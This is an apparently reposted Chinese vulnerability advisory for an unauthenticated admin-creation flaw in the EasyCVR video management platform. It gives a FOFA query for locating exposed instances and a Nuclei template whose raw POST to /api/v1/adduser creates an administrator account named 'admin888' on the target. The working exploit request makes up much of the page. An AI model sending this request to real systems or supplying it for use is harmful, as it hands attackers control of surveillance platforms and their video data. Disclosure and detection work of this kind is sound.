EasyCVR Arbitrary User Addition

漏洞信息

漏洞名称: EasyCVR Arbitrary User Addition

漏洞类型: 未授权访问

漏洞等级: 严重

漏洞描述: EasyCVR是一款视频管理平台,广泛应用于视频监控、智能安防等领域,支持多种视频流的接入、转码、存储和分发。该平台通常部署在企业内部网络或云环境中,用于集中管理和控制视频监控设备。由于其功能的广泛性和易用性,EasyCVR在安防行业中占有重要地位。

该漏洞存在于EasyCVR视频管理平台中,具体表现为平台提供了一个未受保护的API端点(/api/v1/adduser),允许攻击者通过发送特制的HTTP POST请求,无需任何认证即可添加新的管理员用户。这种未授权访问漏洞的根本原因在于平台未能对访问该API端点的请求进行适当的身份验证和授权检查,导致攻击者可以绕过正常的用户管理流程。

利用此漏洞,攻击者可以轻易地在系统中添加具有管理员权限的用户,从而获得对平台的完全控制权。这不仅可能导致敏感视频数据的泄露,还可能被用于进一步的恶意活动,如监控系统的篡改、服务的拒绝等。由于漏洞利用无需任何前置条件,且可以通过网络远程执行,因此其危害性极高,属于严重级别的安全威胁。

产品厂商: EasyCVR

产品名称: EasyCVR-视频管理平台

搜索语法: app=”EasyCVR-视频管理平台”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/ea71139df996d07323020229596156feea815e0e/easycvr-adduser.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

id: easycvr-adduser

info:
  name: EasyCVR Arbitrary User Addition
  author: ProjectDiscoveryAI,dostghost
  severity: critical
  description: |
    EasyCVR video management platform allows arbitrary user addition through an unprotected endpoint. Exploiting this, an attacker can add a new administrator user.
  reference:
    - https://github.com/AboSteam/POPC/blob/main/EasyCVR%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    fofa-query: app="EasyCVR-视频管理平台"
  tags: easycvr, adduser, critical

http:
  - raw:
      - |
        POST /api/v1/adduser HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

    matchers:
      - type: status
        status:
          - 200

Github Poc
#projectdiscovery/nuclei-templates:github issues #未授权访问
EasyCVR Arbitrary User Addition
http://example.com/2025/07/19/github_2575238913/
作者
lianccc
发布于
2025年7月19日
许可协议